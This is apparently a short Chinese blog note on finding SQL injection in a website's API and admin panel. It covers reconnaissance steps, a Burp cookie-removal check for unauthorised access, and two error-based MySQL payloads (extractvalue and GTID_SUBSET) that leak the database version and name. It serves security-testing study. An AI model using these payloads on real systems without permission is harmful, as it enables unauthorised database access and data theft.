api接口导致各种漏洞(sql盲注、报错注入等)
师傅笔记:
1%’ and extractvalue(1, concat(0x7e,(select version()))) and ‘%’=’
1%’ AND GTID_SUBSET(CONCAT(0x7e,(select database()),0x7e),1) AND ‘%’=’
个人笔记:
/img/1-6e771b80.png)
网站的资产归属
/img/2-f6859cf9.png)
查看开放的端口和服务
/img/3-78585879.png)
尝试访问端口,看能否成功跳转。
查询备案号 进行域名筛选
/img/4-f191543a.png)
/img/5-5c79d349.png)
进入后台管理界面,对input进行sql注入测试。
/img/6-e5f63a33.png)
burp抓包删cookie看看是否有未授权
输入11’报sql语句错误,呢么说明存在注入
/img/7-2848eeb5.png)
1%’ and extractvalue(1, concat(0x7e,(select version()))) and ‘%’=’
/img/8-548371b2.png)
api接口导致各种漏洞(sql盲注、报错注入等)
https://jimi-lab.github.io/2024/06/01/api接口导致各种漏洞(sql盲注、报错注入等)/